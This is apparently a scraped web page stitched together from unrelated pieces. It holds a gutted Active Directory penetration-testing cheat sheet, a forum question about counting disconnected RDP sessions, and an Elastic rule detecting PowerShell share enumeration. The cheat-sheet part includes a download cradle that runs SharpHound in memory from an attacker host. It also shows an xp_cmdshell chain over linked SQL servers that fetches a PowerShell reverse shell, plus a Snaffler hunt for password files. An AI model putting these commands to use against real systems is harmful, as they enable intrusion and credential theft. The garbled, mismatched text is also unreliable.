Сканирование и переписание с использованием power shell

This page is a long term work in progress page and will be subject to multiple changes overtime.

Local System Enumeration

# With API Call

Domain Group Enumeration

# Identify Privileged accounts without querying groups

If Constrained Language mode is enabled on the target Domain Controller, Powerview will be heavily restricted for Domain enumeration. However, the AD PowerShell module will not be limited and allow Domain enumeration to continue.

# Standard local execution




# Specify different domain and run in stealth mode and collect only RDP data

# Download and execute in memory
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('http://<IP>:/SharpHound.ps1');Invoke-BloodHound"

Add the queries below into BloodHound for further queries.

Replace the customqueries.json with one of the above files to update the custom queries within Bloodhound. Remember to restart Bloodhound after changing the JSON file.

Locate custom queries file

sudo find / -type f -name customqueries.json 2>/dev/null

Note: Keep in mind that Bloodhound captures a ‘snapshot’ of the current state of Active Directory at the time of capture and as such results may change when captured again in the future.

I am building out a PowerShell script to return the number of disconnected sessions on a Windows server. I’m running into an issue where I can query the sessions on a server but can’t enumerate them into a counter.

For starters I query the active sessions:

query user /server:$SERVER

 USERNAME       SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 user1                              5  Disc     10+14:30  8/3/2023 12:23 PM
 user2                              6  Disc     10+13:38  8/3/2023 6:15 PM
 user3                             10  Disc      5+01:03  8/9/2023 8:27 AM
>iamtheadmin    rdp-tcp#3          14  Active          .  8/14/2023 9:47 AM

Great! Next I try to take the results and convert them into an integer that I can use to do other things (shutdown, reboot, send a notification, etc).

# Initialize a counter for disconnected sessions
$disconnectedSessionCount = 0

# Iterate through each line of the session information
foreach ($line in $sessionInfo) {
    # Split the line into words
    $words = $line -split '\s+'
    
    # Check if the session state is "Disc" (disconnected)
    if ($words[2] -eq "Disc") {
        # Increment the disconnected session counter
        $disconnectedSessionCount++
    }
}

# Output the number of disconnected sessions
Write-Host "Number of Disconnected Sessions: $disconnectedSessionCount"

Attempted to write script that enumerates the number of disconnected sessions on a Windows server. Unfortunately I always get the same result.

Domain Computer Enumeration

# List all computers in current Domain
# Ping all alive computers in current Domain
# List all computers with select Operating System
"Windows 10 Pro"



# Get Computer objects that have Unconstrained Delegation

# Domain Information
# Domain Policy Information

# Get Domain SID

Domain Controller Enumeration

# Get all Domain Dontrollers
# Get Primary Domain Controller
# Get Domain Controller in different Domain

Domain Policy Enumeration

Domain Trust Enumeration

# Enumerate all Domains in the forest
# Get all Domains in Forest then list each Domain trust
# Map all reachable Domain trusts
# List external trusts
# Enumerate trusts across the domain

# Get details about current Forest

# Get all Domains in current Forest

# Get global catalogs in current Forest

# Map Forest trusts

# List all Groups in current Domain
# List all Groups in alternative Domain

# Search for Groups with partial wildcard
# List all local groups on Domain system

# Identify interesting groups on a Domain Controller
# Get all domain controllers then get each group and list members  
# Get All groups and members of groups

Group Managed Service Accounts

# Enumerate GMSA accounts 

# AD Module

# AD Module

Group Policy Enumeration

# Get GPO's in Domain

# Get GPO applied to specific OU

# Get each OU and enumerate GPOs applied to each
# Get GPO applied to system

# Get GPO Restricted Groups
# Get GPO Restricted Groups and list each member of the groups

# Get GPO Permissions

Find GPO’s vulnerable to takeover

# Search for GPO's which may be vulnerable to takeover
# Resolve the SID to identify the principal
# Resolve the SID

Organizational Units Enumeration

# Get all OU's in Domain

# Get all OU names by wildcard 

Access Control Lists

# Get current domain SID and find interesting properties
# Get ACLs for specific AD Object


# Get ACLs for specified prefix
# Search for interesting ACEs
# Get ACLs for select groups
# Find Interesting ACLs from groups we are a member of
# Get ACL for specific path

# Get the ACLs associated with the specified LDAP path to be used for search

AppLocker / WDAC

# Search local system to see if AppLocker used. An error will officure if not in use
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
# Search for AppLocker policy with PowerShell on the local system
# Check local system to see if WDAC is installed

# Search for GPOs that might be related to AppLocker

# Ensure the Base path below is set to the root of the domain

Delegation – Constrained

# Get computer Constrained Delegation

Delegation – Unconstrained

# Get computers with unconstrained delegation

'isDeleted -eq $true'

Machine Account Quota

# Dsicover SQL related groups

# Discovery (SPN Scanning)
# Discovery (Broadcast Domain)
# Discovery (Broadcast Domain)
# Check Accessibility
# Search for database links to remote servers


# Execute commands ( If xp_cmdshell or RPC out is set to enabled)
# If AV is enabled run cradled scripts with functions inline with the script

"exec master..xp_cmdshell 'whoami'"
# Scan for misconfigurations and vulnerabilities

# Search for database links

# Manually searching for Database Links
'select * from master..sysservers'
# Openquery queries can be chained to access links within links (nested links)
'select * from openquery("<Server>",''select * from master..sysservers'')'
# From the initial SQL server, OS commands can be executed using nested link queries

MSSQL – PowerupSQL exploit example

Search for accessible instances in current domain

Run the Get-SQLServerLinkCrawl on an accessible instance.

From the results above the server mssql-master-srv is the enterprise level MSSSQL server running with “sa” privileges. The path field shows in order how this is accessible starting with mssql-srv. We can check for command execution specifying the first accessible instance in the path which, in this case is mssql-srv.

Get-SQLServerLinkCrawl -Instance "mssql-srv" -Query "exec master..xp_cmdshell 'whoami'"
Version     : SQL Server 2017
Instance    : mssql-master-srv
Links       :

With confirmed command execution under the “sa” account on the mssql-master-srv we can then connect remotely by executing a PowerShell download cradle

Get-SQLServerLinkCrawl -Instance mssql-srv -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://<IP>/Invoke-PowerShellTcp.ps1'')"' -E df

# Get all file servers on Domain

# Individual examples
# Config files
# Bak files
# Unattend files
# Batch files
# PowerShell files
# DLL Config files
# SQL files
# Test files
# Password files
# Secret files
# Salary files
# Account files

Snaffler.exe -s -d Domain.local -o snaffler.log -v data

# Retrieve SPN hash

Native AD Module

PowerShell Share Enumeration Scriptedit

: query

• winlogbeat-*
• logs-windows.powershell*

: 47

: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

• Domain: Endpoint
• OS: Windows
• Use Case: Threat Detection
• Tactic: Discovery
• Tactic: Collection
• Tactic: Execution
• Resources: Investigation Guide
• Data Source: PowerShell Logs

• Elastic

: Elastic License v2

Investigation guideedit

Triage and analysis

Possible investigation steps

• Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.
• Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
• Contact the account owner and confirm whether they are aware of this activity.
• Investigate other alerts associated with the user/host during the past 48 hours.
• Evaluate whether the user needs to use PowerShell to complete tasks.
• Check for additional PowerShell and command line logs that indicate that imported functions were run.
• Evaluate which information was potentially mapped and accessed by the attacker.

False positive analysis

• This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.

Response and remediation

• Initiate the incident response process based on the outcome of the triage.
• Isolate the involved hosts to prevent further post-compromise behavior.
• Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
• Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
• Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
• Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.
• Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).

Steps to implement the logging policy with Advanced Audit Configuration:

Computer Configuration >
Administrative Templates >
Windows PowerShell >
Turn on PowerShell Script Block Logging (Enable)

Steps to implement the logging policy via registry:

reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1

event.category:process and host.os.type:windows and
  powershell.file.script_block_text:(
    "Invoke-ShareFinder" or
    "Invoke-ShareFinderThreaded" or
    (
      "shi1_netname" and
      "shi1_remark"
    ) or
    (
      "NetShareEnum" and
      "NetApiBufferFree"
    )
  ) and not user.id : "S-1-5-18"

: MITRE ATT&CK^TM

Похожее:

Как развернуть сценарий power shell в active directory с использованием gpo Windows 10 1080P, 2K, 4K, 5K HD wallpapers free download | Wallpaper Flare «Изменение размера шрифта для устройств Nokia по сравнению с изменением общего масштаба шрифта приложения на Android с использованием Configuration.fontScale»? Что такое файл hosts, зачем он нужен и как его исправить?